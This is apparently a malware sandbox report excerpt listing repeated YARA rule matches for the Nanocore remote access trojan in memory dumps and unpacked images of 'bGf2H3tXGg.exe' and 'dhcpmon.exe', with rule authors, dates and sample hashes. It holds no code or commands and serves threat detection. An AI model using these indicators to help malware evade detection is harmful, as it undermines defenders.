        Source: 00000000.00000002.255989903.00000000029B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000000.00000002.255989903.00000000029B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000011.00000002.323888903.00000000025B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000E.00000002.318765961.0000000002530000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000E.00000002.319780906.0000000004960000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000E.00000002.319780906.0000000004960000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0000000E.00000002.319780906.0000000004960000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000002.311997780.00000000028B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000002.311997780.00000000028B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0000000C.00000002.311997780.00000000028B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000016.00000002.338595453.00000000005A8000.00000004.00000020.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000016.00000002.338595453.00000000005A8000.00000004.00000020.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000003.00000002.486901430.0000000000658000.00000004.00000020.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000003.00000002.486901430.0000000000658000.00000004.00000020.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000011.00000002.322659318.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000011.00000002.322659318.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000011.00000002.322659318.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000E.00000002.318855204.000000000351C000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: bGf2H3tXGg.exe PID: 4656, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: bGf2H3tXGg.exe PID: 4656, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: bGf2H3tXGg.exe PID: 6468, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: bGf2H3tXGg.exe PID: 6468, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: bGf2H3tXGg.exe PID: 6704, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: bGf2H3tXGg.exe PID: 6704, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: bGf2H3tXGg.exe PID: 204, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: bGf2H3tXGg.exe PID: 204, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: dhcpmon.exe PID: 6212, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: dhcpmon.exe PID: 6212, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: dhcpmon.exe PID: 6816, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: dhcpmon.exe PID: 6816, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: dhcpmon.exe PID: 6600, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: dhcpmon.exe PID: 6600, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: dhcpmon.exe PID: 6752, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: dhcpmon.exe PID: 6752, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 22.2.dhcpmon.exe.24bcc88.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.2.dhcpmon.exe.24bcc88.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 11.2.bGf2H3tXGg.exe.29c1458.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 11.2.bGf2H3tXGg.exe.29c1458.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 11.2.bGf2H3tXGg.exe.29c1458.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 3.1.bGf2H3tXGg.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.1.bGf2H3tXGg.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 3.1.bGf2H3tXGg.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 14.2.bGf2H3tXGg.exe.4960000.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.bGf2H3tXGg.exe.4960000.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 14.2.bGf2H3tXGg.exe.4960000.9.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 14.2.bGf2H3tXGg.exe.34e5530.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.bGf2H3tXGg.exe.34e5530.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 14.2.bGf2H3tXGg.exe.34e5530.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 17.2.dhcpmon.exe.3565530.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 17.2.dhcpmon.exe.3565530.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 17.2.dhcpmon.exe.3565530.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 3.2.bGf2H3tXGg.exe.373c0d6.13.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.2.bGf2H3tXGg.exe.373c0d6.13.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 3.2.bGf2H3tXGg.exe.4e70000.16.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.2.bGf2H3tXGg.exe.4e70000.16.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 3.2.bGf2H3tXGg.exe.4e70000.16.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 14.2.bGf2H3tXGg.exe.4960000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.bGf2H3tXGg.exe.4960000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 14.2.bGf2H3tXGg.exe.4960000.9.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 3.2.bGf2H3tXGg.exe.2457edc.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.2.bGf2H3tXGg.exe.2457edc.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 17.2.dhcpmon.exe.35de3de.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 17.2.dhcpmon.exe.35de3de.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 17.2.dhcpmon.exe.35de3de.9.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 3.2.bGf2H3tXGg.exe.37332a7.15.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.2.bGf2H3tXGg.exe.37332a7.15.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 3.2.bGf2H3tXGg.exe.37332a7.15.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 22.2.dhcpmon.exe.2430000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.2.dhcpmon.exe.2430000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 22.2.dhcpmon.exe.2430000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.2.dhcpmon.exe.28b0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.dhcpmon.exe.28b0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.dhcpmon.exe.28b0000.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 3.2.bGf2H3tXGg.exe.374a506.14.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.2.bGf2H3tXGg.exe.374a506.14.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 15.2.dhcpmon.exe.2870000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 15.2.dhcpmon.exe.2870000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 15.2.dhcpmon.exe.2870000.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 22.1.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.1.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 22.1.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 22.2.dhcpmon.exe.3495530.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.2.dhcpmon.exe.3495530.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 22.2.dhcpmon.exe.3495530.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 17.2.dhcpmon.exe.24c0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 17.2.dhcpmon.exe.24c0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
